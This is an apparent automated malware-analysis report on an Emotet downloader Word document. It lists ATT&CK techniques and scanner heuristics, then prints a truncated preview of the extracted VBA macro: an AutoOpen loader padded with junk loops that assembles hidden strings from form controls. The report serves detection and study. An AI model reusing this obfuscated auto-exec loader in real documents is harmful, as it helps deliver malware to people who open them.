Verdict: MALICIOUS (risk score 282)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6969373-0', indicating it is likely part of the Emotet family. Critical heuristics indicate an obfuscated auto-exec VBA loader that uses GetObject for execution, suggesting it is designed to download and run a secondary payload. The presence of legacy WordBasic auto-exec markers and VBA macros further supports this assessment.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6969373-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6969373-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 84a318b69bf57f2170a9736dfadaa2bf8ef07823791c59595077dcb7fbcb5f42) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8185 bytes |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "T7544_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "p3883_5"
Attribute VB_Base = "0{48CCBC35-A633-42BB-8F2F-19BA4241251B}{80AE38D2-94A1-4DCD-AEEA-F844ABDAD7DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "D_23_909"
Attribute VB_Name = "A70721"
Attribute VB_Name = "p91_00"
Attribute VB_Name = "n55686"
Attribute VB_Name = "s043837"
Attribute VB_Name = "q3381_2"
Attribute VB_Base = "0{E9D8652C-019A-4744-B4BB-F572AC8763FF}{38E1CABB-4C12-4BC1-B32E-4A73AE494D20}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "W7_80077"
Function P32_41(k34_7_7)
While c3143_4 And v08974
Close ("X521570")
Close ("h_7_760")
Close ("716998480")
Close ("333246014")
Wend
While G85_5079 And Y00150
Close ("v799545_")
Close ("w9325049")
Close ("789847143")
Close ("447900592")
Wend
While K46848 And N986_9
Close ("W9548314")
Close ("j401_4")
Close ("202799383")
Close ("162131451")
Wend
Set P32_41 = CVar(k34_7_7)
While o47763 And k99_54
Close ("W8_62112")
Close ("r_041901")
Close ("465234597")
Close ("33737622")
Wend
While C3064_ And c31892
Close ("N7_40_2")
Close ("D4085925")
Close ("430944436")
Close ("892798185")
Wend
While j456_608 And T664_00
Close ("H561337")
Close ("C52_218")
Close ("838628702")
Close ("627710716")
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While U5_7888 And j670846
Close ("j45927")
Close ("B4653399")
Close ("796063649")
Close ("59523629")
Wend
While F__531 And N60__147
Close ("W7289890")
Close ("w37974")
Close ("134206871")
Close ("678297840")
Wend
While q9577232 And q2479484
Close ("k523492")
Close ("i523_0")
Close ("55798511")
Close ("371304095")
Wend
Call o73012
While i3_73_0 And s59714
Close ("P_088270")
Close ("t0_936")
Close ("606837940")
Close ("627295910")
Wend
While p80489 And b007_57
Close ("b5_95524")
Close ("r_49642")
Close ("955259392")
Close ("578874310")
Wend
End Sub
Attribute VB_Name = "q94982"
Function o73012()
On Error Resume Next
While q15351 And m354724
Close ("G27237_2")
Close ("M303573")
Close ("889412469")
Close ("190355619")
Wend
While M5882906 And o_136_
Close ("z04451")
Close ("O6_2307")
Close ("53621047")
Close ("934686248")
Wend
O_0426 = p3883_5.f0423943.Tag + q3381_2.I60_9151 + p3883_5.f0423943.Text + q3381_2.J331_05 + p3883_5.f0423943.Value + p3883_5.f0423943 + q3381_2.P854047_ + p3883_5.f0423943.Text + p3883_5.f0423943 + q3381_2.Z_84__ + p3883_5.f0423943.Text + q3381_2.h749931.ControlTipText + p3883_5.f0423943
While c67912 And h8364623
Close ("t0_81525")
Close ("z292131")
Close ("919509130")
Close ("468073194")
Wend
While C922983 And p3_1363
Close ("D__5315")
Close ("B2_5222")
Close ("575845255")
... (truncated)